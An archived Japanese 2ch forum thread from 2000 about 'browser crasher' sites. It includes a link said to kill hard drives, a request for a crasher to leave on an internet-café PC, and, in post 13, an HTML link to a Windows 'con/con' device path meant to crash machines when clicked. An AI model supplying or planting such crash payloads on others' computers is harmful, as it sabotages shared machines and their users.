5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

さいきょうのぶらくら(OSくら)名前は「secoch」HDDも死ぬ!!

1 :しゅこしゅこ:2000/06/03(土) 10:37
http://guts.virtualave.net/
くっそ!!!!
やられたよ!!!!
HDDバックUPしといてほんとよかったよ!!!
みんなHDDバックUPしておいたほうがいいよまじで〜!!!!
関連サイト
http://www.asahi.com/0602/news/national02037.html

2 ::2000/06/03(土) 10:56
↑プラクラ

3 ::2000/06/03(土) 10:57
関連サイトはプラクラ

4 :>3:2000/06/03(土) 11:01
朝日混むが部落らだったらそれはそれで楽しいぞ

5 :つーか:2000/06/03(土) 11:05
逝った先にオチがないぞ>1

6 ::2000/06/03(土) 11:07
レスしろ!ボケぇ!!

7 :気にイラン:2000/06/03(土) 11:07
すでに紫なんだけど。。。

8 :うむ:2000/06/03(土) 12:27
オチないね。

9 :港区:2000/06/03(土) 12:36
今、インターネットカフェにいるんですが
帰る前にHDDにおみやげを置いていきたいので
強烈なブラ蔵きぼーん

だって高いんだもんここ・・・・

10 :/::2000/06/03(土) 12:53
ない?

11 :固定(誉):2000/06/03(土) 20:26
>9
http://guts.virtualave.net/
こいつをホームに設定しておけよ、うっしっし!!!

12 :弐ch編者:2000/06/03(土) 20:37
うっしっし

13 :あいP:2000/06/03(土) 20:47
とりあえず。
メモ帳で
<center>
<font size=+13 color="#ff0000">
<a href="file:///c|con/con/con">押したらだめよ(はァート)</a>
</font>
</center>
作成して、デスクトップにおいとけば?
営業妨害になるかもしれないけど。


2 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)